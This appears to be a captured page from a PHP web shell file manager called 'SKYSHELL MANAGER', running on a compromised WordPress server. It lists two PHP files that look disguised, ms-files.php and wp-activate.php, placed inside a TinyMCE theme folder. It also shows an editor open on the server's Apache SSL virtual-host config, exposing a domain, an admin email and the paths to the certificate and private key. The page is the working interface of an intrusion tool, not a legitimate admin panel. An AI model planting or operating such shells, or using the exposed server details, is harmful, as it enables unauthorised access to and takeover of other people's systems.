📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: 003-loramesh.conf
<IfModule mod_ssl.c> <VirtualHost *:443> ServerName loramesh.hackzogtum-coburg.de ServerAdmin peter@kornherr.it ErrorLog "${APACHE_LOG_DIR}/lm-error.log" CustomLog "${APACHE_LOG_DIR}/lm-access.log" combined DocumentRoot /var/www/loramesh.hackzogtum-coburg.de <Directory /var/www/loramesh.hackzogtum-coburg.de/> AllowOverride All Options FollowSymLinks Multiviews Require all granted </Directory> SSLCertificateFile /etc/letsencrypt/live/loramesh.hackzogtum-coburg.de/fullchain.pem SSLCertificateKeyFile /etc/letsencrypt/live/loramesh.hackzogtum-coburg.de/privkey.pem Include /etc/letsencrypt/options-ssl-apache.conf </VirtualHost> # vim: syntax=apache ts=4 sw=4 sts=4 sr noet </IfModule>
Save